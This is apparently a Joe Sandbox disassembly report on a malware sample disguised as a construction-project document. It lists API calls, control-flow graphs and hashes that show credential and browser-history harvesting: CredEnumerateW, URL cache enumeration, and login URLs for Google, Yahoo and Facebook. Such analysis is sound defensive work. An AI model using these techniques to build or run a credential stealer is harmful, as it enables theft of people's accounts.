                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                          • API String ID: 3849927982-2252543386

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004091E2
                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                          • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                          • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                          • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                          • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                          • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3715365532-3916222277

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                            • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                          • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                          • String ID: bhv
                                                                                                                          • API String ID: 4234240956-2689659898

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                          • API String ID: 2941347001-70141382

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                          • String ID: visited:
                                                                                                                          • API String ID: 2470578098-1702587658
                                                                                                                          • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                          • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                          • memset.MSVCRT ref: 0040E1BD
                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                          • free.MSVCRT ref: 0040E28B
                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                          • API String ID: 2804212203-2982631422
                                                                                                                          • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                          • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                          • memset.MSVCRT ref: 0040BC75
                                                                                                                          • memset.MSVCRT ref: 0040BC8C
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                          • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                          • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 115830560-3916222277
                                                                                                                          • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                          • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError free 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 852 418506-418515 free 845->852 846->845 852->830
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                          • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                          • free.MSVCRT ref: 0041848B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile$ErrorLastfree
                                                                                                                          • String ID: |A
                                                                                                                          • API String ID: 77810686-1717621600
                                                                                                                          • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                          • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0041249C
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                          • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                          • wcscpy.MSVCRT ref: 004125A0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                          • String ID: r!A
                                                                                                                          • API String ID: 2791114272-628097481
                                                                                                                          • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                          • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                          • wcslen.MSVCRT ref: 0040C82C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                          • API String ID: 2936932814-4196376884
                                                                                                                          • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                          • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040A824
                                                                                                                          • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                          • wcscpy.MSVCRT ref: 0040A854
                                                                                                                          • wcscat.MSVCRT ref: 0040A86A
                                                                                                                          • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                          • String ID: C:\Windows\system32
                                                                                                                          • API String ID: 669240632-2896066436
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                          • wcslen.MSVCRT ref: 0040BE06
                                                                                                                          • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                          • memset.MSVCRT ref: 0040BE91
                                                                                                                          • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                          • wcschr.MSVCRT ref: 0040BF24
                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 697348961-0
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00403CBF
                                                                                                                          • memset.MSVCRT ref: 00403CD4
                                                                                                                          • memset.MSVCRT ref: 00403CE9
                                                                                                                          • memset.MSVCRT ref: 00403CFE
                                                                                                                          • memset.MSVCRT ref: 00403D13
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
